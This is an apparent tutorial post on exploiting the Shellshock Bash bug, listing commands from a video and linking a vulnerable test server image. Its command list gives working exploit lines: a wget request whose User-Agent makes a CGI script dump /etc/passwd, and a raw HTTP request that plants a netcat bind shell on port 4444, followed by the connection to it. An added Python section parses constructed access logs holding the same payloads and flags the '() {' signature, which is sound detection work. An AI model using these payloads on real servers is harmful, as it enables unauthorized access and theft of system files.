Performing a shellshock attack

What is shellshock?

Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014. Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbitrary commands. This can allow an attacker to gain unauthorized access to a computer system.

What is the exploit process of this vulnerability?

Well, this video shows how to get access to a server through Shellshock.

Commands used in the video:

  • Scanning the target's open ports and services with nmap
    • nmap -sV -sC -p 80 --stats-every 3s <TARGET>
  • Sniffing the network traffic with tcpdump
    • tcpdump -n host <TARGET>
  • Trying to execute a command remotely on the server and grabbing the contents of the /etc/passwd file
    • wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://<TARGET>/cgi-bin/status
  • Trying to start a bind shell on the compromised server with a netcat listener
    • echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 4444 -e /bin/sh\r\nHost: <TARGET>\r\nConnection: close\r\n\r\n" | nc <TARGET> 80
  • Connecting to the bind shell with netcat
    • nc <TARGET> 4444
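From the defender's side, the two User-Agent payloads above are exactly what a CGI endpoint copies into the environment of the Bash it spawns, and the same `() {` function-definition signature is what a web-server access log scan can flag. The following is an added example, not part of the original post: the Apache combined-format log lines are constructed, and `parse_line` and `find_shellshock` are helper names of my own.

```python
import re

# Constructed Apache combined-format access log lines (not from the original post).
# The second and third lines carry the User-Agent payloads from the commands above;
# Apache escapes embedded double quotes in the agent field as \".
SAMPLE_LOG = r'''
203.0.113.5 - - [24/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [24/Sep/2014:10:00:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 1873 "-" "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd"
203.0.113.7 - - [24/Sep/2014:10:00:15 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; /usr/bin/nc -l -p 4444 -e /bin/sh"
198.51.100.2 - - [24/Sep/2014:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "curl/7.37.0"
'''.strip().splitlines()

# Combined log format: ip ident user [time] "request" status size "referer" "agent".
# The referer and agent groups accept backslash-escaped quotes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Shellshock trigger: a value that looks like a Bash function definition
# "() { ... }" with commands appended after the closing brace. Vulnerable
# Bash required the value to start with exactly "() {"; the pattern is
# deliberately looser so whitespace variants are not missed.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock(lines):
    """Return (ip, request, field) for every line whose request, referer or
    agent carries the Shellshock signature. CGI exports all of these as
    environment variables, so each is a possible injection point."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(rec[field]):
                hits.append((rec["ip"], rec["request"], field))
                break
    return hits

if __name__ == "__main__":
    for ip, req, field in find_shellshock(SAMPLE_LOG):
        print(f"{ip} {req!r}: Shellshock signature in {field}")
```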

Vulnerable server for testing the exploit:

You can download the ISO image from Here and test against it.
